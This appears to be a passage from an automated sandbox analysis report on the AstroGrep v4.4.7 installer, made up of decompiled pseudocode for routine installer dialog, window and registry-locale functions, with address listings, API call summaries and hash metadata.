							E00405D2F(0x429868, "AstroGrep v4.4.7 Setup");
							E00405D51(0x429868, _t125, _t130,  &(0x429868[lstrlenA(0x429868)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x429868); // executed
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x42dbd8); // executed
									 *0x429040 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x42e400,  *_t130 +  *0x42dbe0 & 0x0000ffff, _t125, ("]@@")[ *(_t130 + 4)], _t130); // executed
									__eflags = _t73 - _t133;
									 *0x42dbd8 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403F14(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x42dbd8, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42dbcc - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42dbd8, 8); // executed
									E00403F60(0x405);
									goto L58;
								}
								__eflags =  *0x42e48c - _t133;
								if( *0x42e48c != _t133) {
									goto L61;
								}
								__eflags =  *0x42e480 - _t133;
								if( *0x42e480 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42dbd8); // executed
						 *0x42e408 = _t133;
						EndDialog(_t125,  *0x428c38);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x42dbd8, 0x40f, 0, 1);
						__eflags =  *0x42dbcc - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x429848, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x429848,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403F7B(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x42dbd8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42e48c - _t133;
										if( *0x42e48c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x428c38 = 1;
											L21:
											_push(0x78);
											L22:
											E00403EED();
											goto L26;
										}
										E0040140B(_t127);
										 *0x428c38 = _t127;
										goto L21;
									}
									__eflags = "\t" - _t133; // 0x9
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x42dbd8); // executed
						 *0x42dbd8 = _a12;
						L58:
						_t141 =  *0x42a868 - _t133; // 0x1
						if(_t141 == 0) {
							_t142 =  *0x42dbd8 - _t133; // 0x8003a
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa); // executed
								 *0x42a868 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}
































                                                                                                            0x00403a4a
                                                                                                            0x00403a53
                                                                                                            0x00403b94
                                                                                                            0x00403b98
                                                                                                            0x00403b9c
                                                                                                            0x00403b9e
                                                                                                            0x00403ba3
                                                                                                            0x00403bae
                                                                                                            0x00403bb9
                                                                                                            0x00403bbe
                                                                                                            0x00403bc0
                                                                                                            0x00403bc2
                                                                                                            0x00403bc5
                                                                                                            0x00403bca
                                                                                                            0x00403bd8
                                                                                                            0x00403be5
                                                                                                            0x00403bec
                                                                                                            0x00403bec
                                                                                                            0x00403bed
                                                                                                            0x00403bed
                                                                                                            0x00403bf2
                                                                                                            0x00403bf8
                                                                                                            0x00403bff
                                                                                                            0x00403c05
                                                                                                            0x00403c07
                                                                                                            0x00403c47
                                                                                                            0x00403c4c
                                                                                                            0x00403c51
                                                                                                            0x00403c51
                                                                                                            0x00403c56
                                                                                                            0x00403c5f
                                                                                                            0x00403c61
                                                                                                            0x00403c66
                                                                                                            0x00403c6c
                                                                                                            0x00403c70
                                                                                                            0x00403c70
                                                                                                            0x00403c75
                                                                                                            0x00403c7b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403c86
                                                                                                            0x00403c8c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403c95
                                                                                                            0x00403c9d
                                                                                                            0x00403ca2
                                                                                                            0x00403ca5
                                                                                                            0x00403cab
                                                                                                            0x00403cb0
                                                                                                            0x00403cb3
                                                                                                            0x00403cb9
                                                                                                            0x00403cbe
                                                                                                            0x00403cc1
                                                                                                            0x00403cc7
                                                                                                            0x00403ccf
                                                                                                            0x00403cd5
                                                                                                            0x00403cdb
                                                                                                            0x00403cdf
                                                                                                            0x00403ce6
                                                                                                            0x00403ce6
                                                                                                            0x00403ce6
                                                                                                            0x00403cf0
                                                                                                            0x00403d02
                                                                                                            0x00403d0e
                                                                                                            0x00403d13
                                                                                                            0x00403d1d
                                                                                                            0x00403d23
                                                                                                            0x00403d25
                                                                                                            0x00403d2a
                                                                                                            0x00403d27
                                                                                                            0x00403d27
                                                                                                            0x00403d27
                                                                                                            0x00403d3a
                                                                                                            0x00403d52
                                                                                                            0x00403d54
                                                                                                            0x00403d5a
                                                                                                            0x00403d6f
                                                                                                            0x00403d5c
                                                                                                            0x00403d65
                                                                                                            0x00403d67
                                                                                                            0x00403d67
                                                                                                            0x00403d75
                                                                                                            0x00403d85
                                                                                                            0x00403d96
                                                                                                            0x00403d9d
                                                                                                            0x00403da3
                                                                                                            0x00403da7
                                                                                                            0x00403dac
                                                                                                            0x00403dae
                                                                                                            0x00000000
                                                                                                            0x00403db4
                                                                                                            0x00403db4
                                                                                                            0x00403db6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403dbc
                                                                                                            0x00403dc0
                                                                                                            0x00403de5
                                                                                                            0x00403deb
                                                                                                            0x00403df1
                                                                                                            0x00403df3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403e19
                                                                                                            0x00403e1f
                                                                                                            0x00403e21
                                                                                                            0x00403e26
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403e2c
                                                                                                            0x00403e2f
                                                                                                            0x00403e32
                                                                                                            0x00403e49
                                                                                                            0x00403e55
                                                                                                            0x00403e6e
                                                                                                            0x00403e74
                                                                                                            0x00403e78
                                                                                                            0x00403e7d
                                                                                                            0x00403e83
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403e8d
                                                                                                            0x00403e98
                                                                                                            0x00000000
                                                                                                            0x00403e98
                                                                                                            0x00403dc2
                                                                                                            0x00403dc8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403dce
                                                                                                            0x00403dd4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403dda
                                                                                                            0x00403dae
                                                                                                            0x00403ea5
                                                                                                            0x00403eb1
                                                                                                            0x00403eb8
                                                                                                            0x00000000
                                                                                                            0x00403c09
                                                                                                            0x00403c09
                                                                                                            0x00403c0c
                                                                                                            0x00403c3f
                                                                                                            0x00403c3f
                                                                                                            0x00403c41
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403c41
                                                                                                            0x00403c0e
                                                                                                            0x00403c12
                                                                                                            0x00403c17
                                                                                                            0x00403c19
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403c29
                                                                                                            0x00403c31
                                                                                                            0x00000000
                                                                                                            0x00403c37
                                                                                                            0x00403a65
                                                                                                            0x00403a65
                                                                                                            0x00403a69
                                                                                                            0x00403a6e
                                                                                                            0x00403a7d
                                                                                                            0x00403a7d
                                                                                                            0x00403a86
                                                                                                            0x00403a8f
                                                                                                            0x00403a9a
                                                                                                            0x00403a9a
                                                                                                            0x00403aa6
                                                                                                            0x00403ac2
                                                                                                            0x00403ac5
                                                                                                            0x00403ad8
                                                                                                            0x00403ade
                                                                                                            0x00403b81
                                                                                                            0x00000000
                                                                                                            0x00403b8a
                                                                                                            0x00403ae4
                                                                                                            0x00403af1
                                                                                                            0x00403af3
                                                                                                            0x00403af5
                                                                                                            0x00403b14
                                                                                                            0x00403b14
                                                                                                            0x00403b17
                                                                                                            0x00403b1c
                                                                                                            0x00403b1f
                                                                                                            0x00403b2f
                                                                                                            0x00403b30
                                                                                                            0x00403b32
                                                                                                            0x00403b68
                                                                                                            0x00403b7b
                                                                                                            0x00000000
                                                                                                            0x00403b7b
                                                                                                            0x00403b34
                                                                                                            0x00403b3a
                                                                                                            0x00403b53
                                                                                                            0x00403b58
                                                                                                            0x00403b5a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403b5c
                                                                                                            0x00403b48
                                                                                                            0x00403b48
                                                                                                            0x00403b4a
                                                                                                            0x00403b4a
                                                                                                            0x00000000
                                                                                                            0x00403b4a
                                                                                                            0x00403b3d
                                                                                                            0x00403b42
                                                                                                            0x00000000
                                                                                                            0x00403b42
                                                                                                            0x00403b21
                                                                                                            0x00403b27
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403b29
                                                                                                            0x00000000
                                                                                                            0x00403b29
                                                                                                            0x00403b19
                                                                                                            0x00000000
                                                                                                            0x00403b19
                                                                                                            0x00403aff
                                                                                                            0x00403b06
                                                                                                            0x00403b0c
                                                                                                            0x00403b0e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403b0e
                                                                                                            0x00403aca
                                                                                                            0x00000000
                                                                                                            0x00403aa8
                                                                                                            0x00403aae
                                                                                                            0x00403ab8
                                                                                                            0x00403ebe
                                                                                                            0x00403ebe
                                                                                                            0x00403ec4
                                                                                                            0x00403ec6
                                                                                                            0x00403ecc
                                                                                                            0x00403ed1
                                                                                                            0x00403ed7
                                                                                                            0x00403ed7
                                                                                                            0x00403ecc
                                                                                                            0x00403ee1
                                                                                                            0x00000000
                                                                                                            0x00403ee1
                                                                                                            0x00403aa6

                                                                                                            APIs
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A7D
                                                                                                            • ShowWindow.USER32(?), ref: 00403A9A
                                                                                                            • DestroyWindow.USER32 ref: 00403AAE
                                                                                                            • SetWindowLongA.USER32 ref: 00403ACA
                                                                                                            • GetDlgItem.USER32 ref: 00403AEB
                                                                                                            • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403AFF
                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403B06
                                                                                                            • GetDlgItem.USER32 ref: 00403BB4
                                                                                                            • GetDlgItem.USER32 ref: 00403BBE
                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403BD8
                                                                                                            • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C29
                                                                                                            • GetDlgItem.USER32 ref: 00403CCF
                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00403CF0
                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D02
                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D1D
                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D33
                                                                                                            • EnableMenuItem.USER32 ref: 00403D3A
                                                                                                            • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D52
                                                                                                            • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D65
                                                                                                            • lstrlenA.KERNEL32(AstroGrep v4.4.7 Setup ,?,AstroGrep v4.4.7 Setup ,AstroGrep v4.4.7 Setup), ref: 00403D8E
                                                                                                            • SetWindowTextA.USER32(?,AstroGrep v4.4.7 Setup ), ref: 00403D9D
                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 00403ED1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Window$Item$MessageSend$CallbackDispatcherShowUser$Menu$DestroyEnableEnabledLongSystemTextlstrlen
                                                                                                            • String ID: AstroGrep v4.4.7 Setup$AstroGrep v4.4.7 Setup
                                                                                                            • API String ID: 2523155381-1903755671
                                                                                                            • Opcode ID: fc27e82e98cabd3308fd2f89a2a423f79f43cd40c567b8a18826c7a47723085f
                                                                                                            • Instruction ID: 4996b7fab7fdeaebc033b1676f4cae353b3174fabf4a12f0715eb1af02f584c4
                                                                                                            • Opcode Fuzzy Hash: fc27e82e98cabd3308fd2f89a2a423f79f43cd40c567b8a18826c7a47723085f
                                                                                                            • Instruction Fuzzy Hash: 74C1B131A04205ABDB216F62ED85E2B7EBCFB4570AF40053EF501B11E1C739A942DB6E
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004036AF, Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 96%
                                                                                                            			E004036AF(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x42e410;
				_t17 = E004060C8(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x429868;
					"1033" = 0x30;
					 *0x435001 = 0x78;
					 *0x435002 = 0;
					E00405C16(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x429868, 0);
					__eflags =  *0x429868; // 0x41
					if(__eflags == 0) {
						E00405C16(0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040735A, 0x429868, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					E00405C8D("1033",  *_t17() & 0x0000ffff);
				}
				E00403974(_t71, _t84);
				_t80 = "C:\\Program Files (x86)\\AstroGrep";
				 *0x42e480 =  *0x42e418 & 0x00000020;
				 *0x42e49c = 0x10000;
				if(E0040588F(_t84, "C:\\Program Files (x86)\\AstroGrep") != 0) {
					L16:
					if(E0040588F(_t92, _t80) == 0) {
						E00405D51(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118))); // executed
					}
					_t25 = LoadImageA( *0x42e400, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42dbe8 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403974(_t71, __eflags);
							__eflags =  *0x42e4a0;
							if( *0x42e4a0 != 0) {
								_t28 = E0040501A(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42dbcc; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x429848, 5); // executed
							_t34 = E0040605A("RichEd20"); // executed
							__eflags = _t34;
							if(_t34 == 0) {
								E0040605A("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x42dba0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42dba0);
								 *0x42dbc4 = _t81;
								RegisterClassA(0x42dba0);
							}
							_t36 =  *0x42dbe0; // 0x0
							_t39 = DialogBoxParamA( *0x42e400, _t36 + 0x00000069 & 0x0000ffff, 0, E00403A41, 0); // executed
							E004035FF(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x42e400;
						 *0x42dba4 = E00401000;
						 *0x42dbb0 =  *0x42e400;
						 *0x42dbb4 = _t25;
						 *0x42dbc4 = 0x4091f4;
						if(RegisterClassA(0x42dba0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x429848 = CreateWindowExA(0x80, 0x4091f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42e400, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x42d3a0;
					E00405C16( *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42e438, 0x42d3a0, 0);
					_t57 =  *0x42d3a0; // 0x52
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x42d3a1;
						 *((char*)(E004057CC(0x42d3a1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E00405D2F(_t80, E004057A1(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E004057E8(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                                                                                            0x004036b5
                                                                                                            0x004036be
                                                                                                            0x004036c5
                                                                                                            0x004036c7
                                                                                                            0x004036db
                                                                                                            0x004036ed
                                                                                                            0x004036f4
                                                                                                            0x004036fb
                                                                                                            0x00403701
                                                                                                            0x00403706
                                                                                                            0x0040370c
                                                                                                            0x0040371f
                                                                                                            0x0040371f
                                                                                                            0x0040372a
                                                                                                            0x004036c9
                                                                                                            0x004036d4
                                                                                                            0x004036d4
                                                                                                            0x0040372f
                                                                                                            0x00403739
                                                                                                            0x00403742
                                                                                                            0x00403747
                                                                                                            0x00403758
                                                                                                            0x004037df
                                                                                                            0x004037e7
                                                                                                            0x004037f0
                                                                                                            0x004037f0
                                                                                                            0x00403806
                                                                                                            0x0040380c
                                                                                                            0x0040381a
                                                                                                            0x0040389b
                                                                                                            0x004038a3
                                                                                                            0x004038ad
                                                                                                            0x004038b2
                                                                                                            0x004038b8
                                                                                                            0x00403942
                                                                                                            0x00403947
                                                                                                            0x00403949
                                                                                                            0x00403965
                                                                                                            0x00000000
                                                                                                            0x00403965
                                                                                                            0x0040394b
                                                                                                            0x00403951
                                                                                                            0x00403959
                                                                                                            0x00403959
                                                                                                            0x00000000
                                                                                                            0x00403951
                                                                                                            0x004038c6
                                                                                                            0x004038d1
                                                                                                            0x004038d6
                                                                                                            0x004038d8
                                                                                                            0x004038df
                                                                                                            0x004038df
                                                                                                            0x004038ea
                                                                                                            0x004038f2
                                                                                                            0x004038f4
                                                                                                            0x004038f6
                                                                                                            0x004038ff
                                                                                                            0x00403902
                                                                                                            0x00403908
                                                                                                            0x00403908
                                                                                                            0x0040390e
                                                                                                            0x00403927
                                                                                                            0x00403938
                                                                                                            0x00000000
                                                                                                            0x0040393d
                                                                                                            0x004038a5
                                                                                                            0x004038a7
                                                                                                            0x00000000
                                                                                                            0x0040381c
                                                                                                            0x0040381c
                                                                                                            0x00403828
                                                                                                            0x00403832
                                                                                                            0x00403838
                                                                                                            0x0040383d
                                                                                                            0x0040384c
                                                                                                            0x0040396a
                                                                                                            0x0040396a
                                                                                                            0x00000000
                                                                                                            0x0040396a
                                                                                                            0x0040385b
                                                                                                            0x00403896
                                                                                                            0x00000000
                                                                                                            0x00403896
                                                                                                            0x0040375e
                                                                                                            0x0040375e
                                                                                                            0x00403763
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040376d
                                                                                                            0x0040377d
                                                                                                            0x00403782
                                                                                                            0x00403789
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040378d
                                                                                                            0x0040378f
                                                                                                            0x0040379c
                                                                                                            0x0040379c
                                                                                                            0x004037a4
                                                                                                            0x004037aa
                                                                                                            0x004037d2
                                                                                                            0x004037da
                                                                                                            0x00000000
                                                                                                            0x004037bc
                                                                                                            0x004037bd
                                                                                                            0x004037c6
                                                                                                            0x004037cc
                                                                                                            0x004037cd
                                                                                                            0x00000000
                                                                                                            0x004037cd
                                                                                                            0x004037c8
                                                                                                            0x004037ca
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004037ca
                                                                                                            0x004037aa

                                                                                                            APIs
                                                                                                              • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                                              • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                                            • lstrcatA.KERNEL32(1033,AstroGrep v4.4.7 Setup ,80000001,Control Panel\Desktop\ResourceLocale,00000000,AstroGrep v4.4.7 Setup ,00000000,00000002,74B5FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" ,00000000), ref: 0040372A
                                                                                                            • lstrlenA.KERNEL32(Remove folder: ,?,?,?,Remove folder: ,00000000,C:\Program Files (x86)\AstroGrep,1033,AstroGrep v4.4.7 Setup ,80000001,Control Panel\Desktop\ResourceLocale,00000000,AstroGrep v4.4.7 Setup ,00000000,00000002,74B5FA90), ref: 0040379F
                                                                                                            • lstrcmpiA.KERNEL32(?,.exe,Remove folder: ,?,?,?,Remove folder: ,00000000,C:\Program Files (x86)\AstroGrep,1033,AstroGrep v4.4.7 Setup ,80000001,Control Panel\Desktop\ResourceLocale,00000000,AstroGrep v4.4.7 Setup ,00000000), ref: 004037B2
                                                                                                            • GetFileAttributesA.KERNEL32(Remove folder: ), ref: 004037BD
                                                                                                            • LoadImageA.USER32 ref: 00403806
                                                                                                              • Part of subcall function 00405C8D: wsprintfA.USER32 ref: 00405C9A
                                                                                                            • RegisterClassA.USER32 ref: 00403843
                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040385B
                                                                                                            • CreateWindowExA.USER32 ref: 00403890
                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 004038C6
                                                                                                            • GetClassInfoA.USER32 ref: 004038F2
                                                                                                            • GetClassInfoA.USER32 ref: 004038FF
                                                                                                            • RegisterClassA.USER32 ref: 00403908
                                                                                                            • DialogBoxParamA.USER32 ref: 00403927
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: "C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" $.DEFAULT\Control Panel\International$.exe$1033$AstroGrep v4.4.7 Setup $C:\Program Files (x86)\AstroGrep$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$Remove folder: $RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                            • API String ID: 1975747703-498010037
                                                                                                            • Opcode ID: bbcc0ab7bdbe30227ddd5912a7935d2a12b8b01ad7e03ac62d617ac8d3ddabba
                                                                                                            • Instruction ID: 60e5f6254d87716c4f77e59e0de616dae33e132719ef70849b8472436850552a
                                                                                                            • Opcode Fuzzy Hash: bbcc0ab7bdbe30227ddd5912a7935d2a12b8b01ad7e03ac62d617ac8d3ddabba
                                                                                                            • Instruction Fuzzy Hash: 4161E6B07442006EE620BF269C85F373EACEB45749F50443FF945B62E2C67CAD429A2D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0040405D, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 205windowstringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E0040405D(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t103;
				signed int _t106;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L11:
						__eflags = _a8 - 0x4e;
						if(_a8 != 0x4e) {
							__eflags = _a8 - 0x40b;
							if(_a8 == 0x40b) {
								 *0x428834 =  *0x428834 + 1;
								__eflags =  *0x428834;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403F7B(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
								_t109 =  *((intOrPtr*)(_t110 + 0x18));
								_v12 = _t100;
								__eflags = _t100 - _t109 - 0x800;
								_v16 = _t109;
								_v8 = 0x42d3a0;
								if(_t100 - _t109 < 0x800) {
									SendMessageA(_t52, 0x44b, 0,  &_v16);
									SetCursor(LoadCursorA(0, 0x7f02));
									ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
									SetCursor(LoadCursorA(0, 0x7f00));
									_t110 = _a16;
								}
							}
						}
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
							goto L26;
						} else {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
								goto L26;
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42e408, 0x111, 1, 0);
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42e408, 0x10, 0, 0);
							}
							return 1;
						}
					}
					__eflags = _a12 >> 0x10;
					if(_a12 >> 0x10 != 0) {
						goto L25;
					}
					__eflags =  *0x428834; // 0x1
					if(__eflags != 0) {
						goto L25;
					}
					_t103 =  *0x429040; // 0x6eafd4
					_t25 = _t103 + 0x14; // 0x6eafe8
					_t112 = _t25;
					__eflags =  *_t112 & 0x00000020;
					if(( *_t112 & 0x00000020) == 0) {
						goto L25;
					}
					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
					__eflags = _t106;
					 *_t112 = _t106;
					E00403F36(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
					E004042E7();
					goto L11;
